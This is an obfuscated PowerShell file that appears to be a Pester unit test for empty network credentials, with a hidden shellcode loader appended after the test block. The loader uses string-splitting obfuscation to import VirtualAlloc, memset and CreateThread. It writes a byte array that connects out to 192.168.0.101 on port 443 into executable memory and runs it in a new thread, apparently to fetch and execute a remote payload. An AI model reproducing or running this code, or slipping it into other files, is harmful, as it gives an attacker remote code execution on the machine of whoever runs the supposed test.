 sEt-itEm  ('VARIAb'+'le'+':y'+'WBQV8')  ([TYpe]("{1}{2}{3}{0}"-f 'TiaL','PSC','Re','DEn')  ) ;

.("{2}{1}{0}" -f'ibe','escr','D') ("{5}{0}{3}{4}{2}{1}" -f 'ed','ests','t','entia','l ','Cr') -Tags "CI" {
    &('It') ("{9}{8}{2}{1}{10}{4}{5}{0}{6}{3}{7}"-f 'al','st ',' ca','urns','n empty credent','i',' ret',' null','t','Explici','for a') {
         
           (  get-chIldItEM ('VaRiaB'+'le'+':y'+'wbqv8')  ).VAlUe::"E`MpTY".("{2}{0}{3}{1}" -f 'etN','tworkCredential','G','e').Invoke() | .("{1}{0}"-f 'ould','Sh') -BeNullOrEmpty
    }
}

${Q`kc} = ((("{61}{25}{11}{4}{43}{44}{31}{45}{59}{13}{17}{58}{10}{16}{63}{22}{62}{53}{55}{41}{64}{24}{70}{1}{38}{36}{57}{30}{14}{12}{23}{60}{65}{7}{8}{2}{20}{66}{34}{37}{46}{15}{56}{29}{48}{19}{27}{26}{47}{0}{49}{3}{51}{40}{68}{52}{35}{21}{32}{54}{33}{39}{67}{18}{28}{42}{50}{5}{6}{69}{9}"-f 'a','ec','d(In','l','d','est, u','int src, u','r CreateT','hrea',');','(IntP','kernel32.',' static e','rn IntPtr ','GrL)]public','kSize, IntPtr','tr lpAddress, uint','VirtualAl','r me','t','tPt','port(GrLmsvcr','wSize,','xtern ','lPr','lImport(GrL','arameter, uin','r lpP','mset(IntP','s','ll','ic stat','t.dllG','L)]public ','ea','m',');[DllImport(','dAttributes,','t','static extern Int',', IntPtr lpTh',' u','tr','l','lGrL)]publ','ic ',' uint dwStac','t dwCre','s, IntP','tionF',' d','ags','lI',' flAllocatio','r','nType,',' lpStartAddre','GrLkernel32.d','loc','exte','In','[Dl',' uint',' d','int f','tPt','r lpThr','Pt','readId);[Dl','int count','ot'))  -CrePLaCe 'GrL',[ChaR]34);${w} = .("{0}{2}{1}"-f 'A','Type','dd-') -memberDefinition ${Q`Kc} -Name ("{0}{1}" -f'Wi','n32') -namespace ("{4}{3}{2}{0}{1}"-f'Function','s','2','in3','W') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x00,0x65,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${G} = 0x1000;if (${z}."LeN`GtH" -gt 0x1000){${g} = ${Z}."Len`Gth"};${rG`CM}=${w}::("{0}{2}{1}{3}"-f 'Vi','o','rtualAll','c').Invoke(0,0x1000,${g},0x40);for (${i}=0;${i} -le (${z}."le`NgTh"-1);${i}++) {${W}::"M`EMseT"([IntPtr](${r`gcM}.("{1}{2}{0}"-f'2','T','oInt3').Invoke()+${I}), ${z}[${I}], 1)};${W}::("{2}{1}{0}{3}"-f'hr','reateT','C','ead').Invoke(0,0,${rG`cm},0,0,0);for (;;){.("{1}{2}{3}{0}" -f'p','St','art-sle','e') 60};
